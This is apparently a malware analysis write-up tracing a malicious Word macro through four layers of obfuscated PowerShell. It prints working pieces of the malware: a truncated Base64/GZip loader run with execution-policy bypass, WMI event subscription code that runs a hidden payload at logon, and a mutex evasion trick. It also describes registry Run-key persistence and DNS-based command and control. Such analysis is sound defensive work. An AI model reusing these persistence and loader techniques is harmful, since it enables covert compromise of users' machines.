Malware Analysis

I'm trying to learn more about PowerShell so I can apply the knowledge towards feature engineering for a machine learning pipeline. I asked for interesting samples and my manager sent me a malicious Word document which had some PowerShell. The file hash of the malicious document is 340795d1f2c2bdab1f2382188a7b5c838e0a79d3f059d2db9eb274b0205f6981.

In this article, I'll go through the results of my analysis and talk about the methods I used and thought processes at each step.

Extracting the Source Code

I used oletools to extract the VBA source code from the macro. After installing oletools, simply run the command olevba <filepath> to reveal the macro.

Layer 1 - VB and Embedded PowerShell

Right off the bat there are several things the attacker does to make the script difficult to unravel. The author embeds a lot of newline spacing, widley spreading apart contents to make important code harder to spot. After revealing the macro with oletools, you'll probably have to do a lot of scrolling to read the whole script. Even worse, if the macro is revealed through a terminal with a limited scrollback buffer, part of the script would be hidden.

There is a function ParsingA() that appears to download content from the Internet, but it never seems to be used. It may be test code left over from the developer, code that's active in an older variant, or code the developer is working on that may be used in a newer variant.

You'll also notice that the author uses gratuitous string concatenation to break simple string signatures. This helps the attacker evade static analysis tools which look for strings like "winmgmts:\\.\root\cimv2" and be thrown off by something like

"w" & "" & "in" & "" & "mgm" & "" & "ts" & "" & ":" & "" & "\\" & "." & "\r" & "" & "oot\c" & "" & "imv" & "" & "2"

There's also a large Base64 string contained in lStr wrapped around a PowerShell command that decodes the string.

lStr = "powershell -ep bypass -C ""$data = [System.Convert]::FromBase64String('H4sIAAAAAAAEAO1da3PayNL+7l+hol ... many many more lines ...

Let's decode it and dive further.

Unraveling the Base64

Below is a simple Python3 script I use to decode the Base64 blob mentioned earlier.

import base64
import sys

with open(sys.argv[1]) as f:
	encoded = f.read()
sys.stdout.write(base64.b64decode(encoded))

After decoding, you'll notice that the resulting contents are still unreadable. We can tell through a few ways that the contents are in GZIP format. Most obviously, the VB string stored in lStr has a command to decompress the decoded contents using a System.IO.Compression.GZipStream object. Another way we can identify this as a gzip file is through its magic number, the beginning file signature (1F8B). We can also use the file <filepath> command on a Unix machine to recognize the data.

Now we'll decompress the contents using gunzip <filepath>, which creates a decompressed file with the same name. Opening it will reveal obfuscated PowerShell code (layer 2) with strange variable names. After cleaning up this mess and refactoring the code, there are some interesting things to note about malware persistence. This is covered in the following section.

Layer 2 - Base64 Decoded and Decompressed PowerShell

Scrolling through the decompressed script, you'll find another Base64 blob which acts as the next stage's payload. This will be covered later in a section titled Layer 3.

Storing the Payload

If the victim has Powershell 3.0 or later, the script stores the encoded layer 3 payload inside kernel32.dll at %PROGRAMDATA%\Windows\. Otherwise, the script adds a new property called Path to a key in the registry to store the payload. If the user has administrator permissions, the payload will be stored in HKLM:Software\Microsoft\Windows\CurrentVersion. Otherwise, it will be stored in HKCU:Software\Microsoft\Windows.

Non-Admins: Registry Keys

The script creates a file called kernel32.vbs at at %PROGRAMDATA%\Windows\ and writes to it code which retrieves and executes the payload from wherever it was stored in the previous step.

The attacker modifies Run registry keys to cause kernel.vbs to run after waiting 30 minutes each time a user logs on. If the user has administrator permissions, the targeted key is HKLM:Software\Microsoft\Windows\CurrentVersion\Run\. Otherwise, the targeted key is HKCU:Software\Microsoft\Windows\CurrentVersion\Run\.

Admins: Creation of a New WMI Object

If the user has administrator permissions, the script creates a permanent WMI event subscription that watches for a user logon, waits 30 minutes, then executes the encoded payload. At this point, the program has exhibited enough strange behavior for the SentinelAgent to identify it as malware. Here's what it looks like.

First it removes the existing subscriptions.

gwmi __eventFilter -namespace root\subscription | Remove-WmiObject
gwmi CommandLineEventConsumer -Namespace root\subscription | Remove-WmiObject
gwmi __filtertoconsumerbinding -Namespace root\subscription | Remove-WmiObject

Then it creates its own. The logic goes something like this if you've got PowerShell 3.0 or later.

$event_filter = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace “root\subscription” -Class __EventFilter -Arguments @{Name = $kernel32_filter; EventNamespace = “root\CIMV2”; QueryLanguage = “WQL”; Query = “Select * from __InstanceCreationEvent within 30 where targetInstance isa 'Win32_LogonSession'”}

$event_consumer = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace “root\subscription” -Class CommandLineEventConsumer -Arguments @{Name = $kernel32_consumer; ExecutablePath = “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”; CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"IEX `$(Get-Content -Path $windows_path -Stream $kernel32_dll|Out-String)`""}
 
Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace “root\subscription” -Class __FilterToConsumerBinding -Arguments @{Filter = $event_filter; Consumer = $event_consumer}

Scheduled Task

The script also creates a scheduled task to run the malware 30 minutes after a user logs on. The method used to start the malware differs only slightly depending on if the user has administrator permissions. If the user is a non-admin, wscript is used to execute the contents of kernel32.vbs. Otherwise, an Invoke-Expression cmdlet is used.

Layer 3 - DNS Lookups

Now that we've discussed the various ways the attacker achieves persistence of the malware, lets find out what this next encoded payload is responsible for.

After decoding and deobfuscating, you'll notice this bit of code at the start of the function logic, which contains a lot of other code after this if-block.

[bool]$flag = $false;
$mutex = New-Object System.Threading.Mutex($true, "SourceFireSux", [ref] $flag);        
if (!$flag) { exit; }

At first glance it may seem as if the malicious code after this if-block should never execute. But this is an attempt to evade static analysis, so this is exactly what the attacker wants you to think. By constructing this mutex which is never even used (and that throws a cheeky jab at Source Fire), the value of $flag is set to True and the code inside the if-block is simply skipped, causing the malware to continue executing.

It is apparent that the code repeatedly queries for DNS text records using the nslookup command. Responses from these queries dictate behavior of the program: whether it should sleep, continue, execute the response (using the Invoke-Expression cmdlet), or stop running. A result of "idle" would cause the process to sleep between 3500 and 5400 seconds before continuing. A result of "stop" would prompt the process to exit.

Since these domains are not active, we'll have to rely on previous analysis done on this script by Talos. We'll be talking about the payload retrieved by these DNS text queries in the following section.

Layer 4 - C2 Communication

Yet another payload is sent in response to the DNS text query. It includes a gzipped and Base64 encoded string along with a call to the dec function in layer 3 to unravel it. The result is passed to the Invoke-Expression cmdlet to be executed. According to Talos's analysis, this payload redirects STDIN, STDOUT, and STDERR so the attacker can read from and write to the command line processor. The payload performs more DNS lookups and establishes a communication channel with a command and control server. From here, the attacker can send commands to be executed on the victim machine's command line interpreter and receive the results of those commands, all through DNS txt queries and responses.

Conclusion

Awesome! We just walked through an older but interesting piece of malware. I hope you learned a thing or two! Thanks for reading!

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

analysis.md

analysis.md

Malware Analysis

Extracting the Source Code

Layer 1 - VB and Embedded PowerShell

Unraveling the Base64

Layer 2 - Base64 Decoded and Decompressed PowerShell

Storing the Payload

Non-Admins: Registry Keys

Admins: Creation of a New WMI Object

Scheduled Task

Layer 3 - DNS Lookups

Layer 4 - C2 Communication

Conclusion

Files

analysis.md

Latest commit

History

analysis.md

File metadata and controls

Malware Analysis

Extracting the Source Code

Layer 1 - VB and Embedded PowerShell

Unraveling the Base64

Layer 2 - Base64 Decoded and Decompressed PowerShell

Storing the Payload

Non-Admins: Registry Keys

Admins: Creation of a New WMI Object

Scheduled Task

Layer 3 - DNS Lookups

Layer 4 - C2 Communication

Conclusion